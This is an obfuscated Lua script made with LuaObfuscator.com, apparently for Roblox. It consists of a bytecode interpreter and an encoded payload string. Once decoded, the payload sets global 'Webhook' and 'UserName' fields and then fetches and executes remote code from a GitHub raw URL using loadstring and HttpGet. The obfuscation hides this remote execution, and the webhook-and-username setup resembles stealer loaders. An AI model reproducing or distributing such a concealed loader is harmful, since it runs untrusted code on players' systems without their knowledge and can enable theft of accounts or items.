--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v67=v2(v0(v30,16));if v19 then local v76=0;local v77;while true do if (v76==1) then return v77;end if (v76==0) then v77=v5(v67,v19);v19=nil;v76=1;end end else return v67;end end end);local function v20(v31,v32,v33)if v33 then local v68=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -((2494 -(1523 + 114)) + 74)))) ;return v68-(v68%((512 + 57) -(367 + 201))) ;else local v69=0;local v70;while true do if (v69==((1321 -394) -((1279 -(68 + 997)) + (1983 -(226 + 1044))))) then v70=(1 + 1)^(v32-(4 -3)) ;return (((v31%(v70 + v70))>=v70) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v36 * (57 + 199)) + v35 ;end local function v23()local v37=957 -(892 + 65) ;local v38;local v39;local v40;local v41;while true do if (v37==(2 -(3 -2))) then return (v41 * (31011612 -14234396)) + (v40 * (120312 -54776)) + (v39 * (606 -(87 + 263))) + v38 ;end if (v37==(180 -(67 + 113))) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + ((961 -(802 + 150)) -5) ;v37=1 + 0 ;end end end local function v24()local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,1 -(0 -0) ,76 -56 ) * ((444 -(416 + 26))^(102 -70))) + v42 ;local v46=v20(v43,10 + 11 ,23 + 8 );local v47=((v20(v43,1029 -(915 + 82) )==(2 -1)) and  -(439 -((514 -369) + 293))) or (1 + 0) ;if (v46==(0 -0)) then if (v45==((1289 -(814 + 45)) -(44 + 386))) then return v47 * ((2924 -1737) -(1069 + 118)) ;else v46=2 -1 ;v44=0 -0 ;end elseif (v46==(356 + 1691)) then return ((v45==(0 -(0 + 0))) and (v47 * ((4 -3)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1814 -(131 + 237 + 423)) ) * (v44 + (v45/((6 -4)^52))) ;end local function v25(v48)local v49;if  not v48 then local v71=885 -((884 -623) + (2954 -2330)) ;while true do if (v71==(0 -0)) then v48=v23();if (v48==(1080 -(402 + 618 + 60))) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v65=1424 -(630 + 793) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 -0 ;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v51==(374 -(123 + 251))) then v52={};v53={};v54={};v55={v52,v53,nil,v54};v51=1;end if ((1 + 0)~=v51) then else v56=v23();v57={};for v78=1,v56 do local v79=0;local v80;local v81;local v82;local v83;while true do if (v79==0) then v80=0;v81=nil;v79=1;end if (v79==(838 -(660 + 176))) then while true do if ((0 + 0)~=v80) then else local v113=0;while true do if (v113==(202 -(14 + 188))) then v81=675 -(534 + 141) ;v82=nil;v113=1;end if ((1 + 0)==v113) then v80=1 + 0 ;break;end end end if (1==v80) then v83=nil;while true do if (v81==(0 + 0)) then local v114=0 -0 ;while true do if (v114==0) then v82=v21();v83=nil;v114=1 -0 ;end if (1==v114) then v81=1;break;end end end if (v81~=1) then else if (v82==(2 -1)) then v83=v21()~=0 ;elseif (v82==(2 + 0)) then v83=v24();elseif (v82==3) then v83=v25();end v57[v78]=v83;break;end end break;end end break;end if (v79~=(1 + 0)) then else v82=nil;v83=nil;v79=398 -(115 + 281) ;end end end v55[3]=v21();v51=4 -2 ;end if (v51==(2 + 0)) then for v84=2 -1 ,v23() do local v85=0;local v86;local v87;local v88;while true do if (v85~=(3 -2)) then else v88=nil;while true do if (v86==(867 -(550 + 317))) then v87=0;v88=nil;v86=1;end if (1==v86) then while true do if ((0 -0)==v87) then v88=v21();if (v20(v88,1 -0 ,1)==(0 -0)) then local v116=0;local v117;local v118;local v119;local v120;while true do if (v116~=1) then else v119=nil;v120=nil;v116=287 -(134 + 151) ;end if (v116~=0) then else v117=1665 -(970 + 695) ;v118=nil;v116=1;end if (v116==(3 -1)) then while true do if (v117~=0) then else local v166=1990 -(582 + 1408) ;local v167;while true do if (v166~=0) then else v167=0 -0 ;while true do if ((0 -0)~=v167) then else local v183=0;while true do if (v183~=(3 -2)) then else v167=1;break;end if (v183==0) then v118=v20(v88,2,3);v119=v20(v88,1828 -(1195 + 629) ,7 -1 );v183=1;end end end if (v167==1) then v117=1;break;end end break;end end end if (v117==(242 -(187 + 54))) then v120={v22(),v22(),nil,nil};if (v118==(0 + 0)) then local v172=0;local v173;local v174;local v175;while true do if (v172~=0) then else v173=0;v174=nil;v172=1;end if (1==v172) then v175=nil;while true do if (v173~=(1 + 0)) then else while true do if (v174==(0 -0)) then v175=0;while true do if (v175==0) then v120[3]=v22();v120[6 -2 ]=v22();break;end end break;end end break;end if (0~=v173) then else local v185=0 + 0 ;while true do if ((1637 -(1373 + 263))~=v185) then else v173=1001 -(451 + 549) ;break;end if ((0 + 0)==v185) then v174=0;v175=nil;v185=1 -0 ;end end end end break;end end elseif (v118==(1 -0)) then v120[3]=v23();elseif (v118==2) then v120[1387 -(746 + 638) ]=v23() -(2^(7 + 9)) ;elseif (v118~=(4 -1)) then else local v186=0;while true do if (v186==(341 -(218 + 123))) then v120[3]=v23() -((1583 -(1535 + 46))^(16 + 0)) ;v120[1 + 3 ]=v22();break;end end end v117=562 -(306 + 254) ;end if (v117==(1 + 2)) then if (v20(v119,5 -2 ,1470 -(899 + 568) )~=1) then else v120[3 + 1 ]=v57[v120[4]];end v52[v84]=v120;break;end if (v117==2) then local v169=0 -0 ;while true do if ((603 -(268 + 335))==v169) then if (v20(v119,291 -(60 + 230) ,1)~=1) then else v120[2]=v57[v120[2]];end if (v20(v119,2,574 -(426 + 146) )~=1) then else v120[1 + 2 ]=v57[v120[1459 -(282 + 1174) ]];end v169=1;end if (v169==(812 -(569 + 242))) then v117=3;break;end end end end break;end end end break;end end break;end end break;end if (v85==0) then v86=0;v87=nil;v85=1;end end end for v89=2 -1 ,v23() do v53[v89-1 ]=v28();end return v55;end end end local function v29(v58,v59,v60)local v61=0;local v62;local v63;local v64;while true do if (v61==1) then v64=v58[3];return function(...)local v91=v62;local v92=v63;local v93=v64;local v94=v27;local v95=1;local v96= -1;local v97={};local v98={...};local v99=v12("#",...) -1 ;local v100={};local v101={};for v105=0,v99 do if (v105>=v93) then v97[v105-v93 ]=v98[v105 + 1 ];else v101[v105]=v98[v105 + 1 ];end end local v102=(v99-v93) + 1 ;local v103;local v104;while true do local v106=0;while true do if (v106==0) then v103=v91[v95];v104=v103[1];v106=1;end if (v106==1) then if (v104<=10) then if (v104<=4) then if (v104<=1) then if (v104==0) then v101[v103[2]]();else v101[v103[2]]=v103[3];end elseif (v104<=2) then local v123=v103[2];v101[v123]=v101[v123](v13(v101,v123 + 1 ,v96));elseif (v104>3) then local v136=v103[2];local v137,v138=v94(v101[v136](v13(v101,v136 + 1 ,v103[3])));v96=(v138 + v136) -1 ;local v139=0;for v160=v136,v96 do local v161=0;while true do if (0==v161) then v139=v139 + 1 ;v101[v160]=v137[v139];break;end end end else do return;end end elseif (v104<=7) then if (v104<=5) then if (v101[v103[2]]==v103[4]) then v95=v95 + 1 ;else v95=v103[3];end elseif (v104==6) then if (v101[v103[2]]==v103[4]) then v95=v95 + 1 ;else v95=v103[3];end else v101[v103[2]]=v60[v103[3]];end elseif (v104<=8) then v101[v103[2]]=v103[3]~=0 ;elseif (v104>9) then v101[v103[2]][v103[3]]=v103[4];else do return;end end elseif (v104<=15) then if (v104<=12) then if (v104==11) then v101[v103[2]]=v103[3]~=0 ;else v101[v103[2]][v103[3]]=v103[4];end elseif (v104<=13) then v101[v103[2]]=v60[v103[3]];elseif (v104>14) then v95=v103[3];else local v146=v103[2];local v147=v101[v103[3]];v101[v146 + 1 ]=v147;v101[v146]=v147[v103[4]];end elseif (v104<=18) then if (v104<=16) then local v131=v103[2];local v132=v101[v103[3]];v101[v131 + 1 ]=v132;v101[v131]=v132[v103[4]];elseif (v104==17) then v101[v103[2]]=v103[3];else local v153=v103[2];local v154,v155=v94(v101[v153](v13(v101,v153 + 1 ,v103[3])));v96=(v155 + v153) -1 ;local v156=0;for v162=v153,v96 do v156=v156 + 1 ;v101[v162]=v154[v156];end end elseif (v104<=19) then v101[v103[2]]();elseif (v104>20) then v95=v103[3];else local v158=v103[2];v101[v158]=v101[v158](v13(v101,v158 + 1 ,v96));end v95=v95 + 1 ;break;end end end end;end if (v61==0) then v62=v58[1];v63=v58[2];v61=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03013O0020030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503093O00557365724E616D653200173O0012113O00013O0026053O000E0001000200040F3O000E000100120D000100033O00300C00010004000500120D000100063O00120D000200073O00200E000200020008001211000400094O000B000500014O0012000200054O000200013O00024O00010001000100040F3O001600010026053O00010001000100040F3O0001000100120D000100033O00300C0001000A000500120D000100033O00300C0001000B00050012113O00023O00040F3O000100012O00093O00017O00",v9(),...);end
